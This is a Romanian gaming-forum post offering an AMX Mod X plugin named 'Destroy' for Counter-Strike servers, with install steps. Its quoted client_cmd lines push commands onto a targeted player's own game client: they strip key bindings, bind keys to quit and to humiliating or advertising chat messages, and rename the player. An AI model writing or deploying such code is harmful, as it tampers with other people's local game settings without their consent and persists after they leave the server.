Spion-Zone

Bine Ati Venit Pe Forum ! Va mai asteptam !

AcasaAcasa  PortalPortal  InregistrareInregistrare  ConectareConectare  Banuri  
Daca aveti vreo nemultumire Contactatima la ID:N_Adidas72 !!!
RECLAMA PLATITA:  NEW-CS.RO  | Link-ul tau  | Link-ul tau  | Link-ul tau  | Link-ul tau  | Link-ul tau  | Link-ul tau  | Link-ul tau  | Link-ul tau  | Link-ul tau  | 

Distribuiţi | 

Destroy amxmodx

Vezi subiectul anterior Vezi subiectul urmator In jos 
AutorMesaj
FakE!x

Reputatie : 0

MesajSubiect: Destroy amxmodx   Joi Sept 01, 2011 12:42 am

Descriere: Este pluginul potrivit pentru codatii care au IP Dinamic si se tot reconecteaza pe server. Dupa ce ii este aplicata comanda unui player, totate oanele sunt bindate pentru a se sinucite dupa care ii este schimbat numele, ii sunt facute 3 poze si primeste ban permanent.

* Pluginul este facut pentru CsRedDevil.Com, mai exact pentru serverul de War3FT. Modificati fiecare pentru propriul server urmatoarele linii:

Cod:
client_cmd(target,"unbind w;wait;unbind a;unbind s;wait;unbind d;bind mouse1 ^"say Am luat DESTROY pe War3.CsRedDeviL.Com.^";wait;unbind mouse2;unbind mouse3;wait;bind space quit")
       client_cmd(target,"unbind ctrl;wait;unbind 1;unbind 2;wait;unbind 3;unbind 4;wait;unbind 5;unbind 6;wait;unbind 7")
       client_cmd(target,"unbind 8;wait;unbind 9;unbind 0;wait;unbind r;unbind e;wait;unbind g;unbind q;wait;unbind shift")
       client_cmd(target,"unbind end;wait;bind escape ^"say Sunt neajutorat ca un mic cacat^";unbind z;wait;unbind x;unbind c;wait;unbind uparrow;unbind downarrow;wait;unbind leftarrow")
       client_cmd(target,"unbind rightarrow;wait;unbind mwheeldown;unbind mwheelup;wait;bind ` ^"say Intrati pe cel mai tare server - War3.CsRedDeviL.Com !^";bind ~ ^"say Am fost distrus .^";wait;name ^"War3.CsRedDeviL.Com^"")

Download: Destroy - SMA ; Destroy - AMXX

Instalare:
1. Copiati "amx_destroy.amxx" in "addons/amxmodx/plugins"
2. Deschideti "plugins.ini" din "addons/amxmodx/configs" si adaugati la coada:

Cod:
amx_destroy.amxx
Sus In jos
Vizitato

Vizitator

MesajSubiect: Re: Destroy amxmodx   Sam Sept 03, 2011 8:19 am

Sus In jos

Destroy amxmodx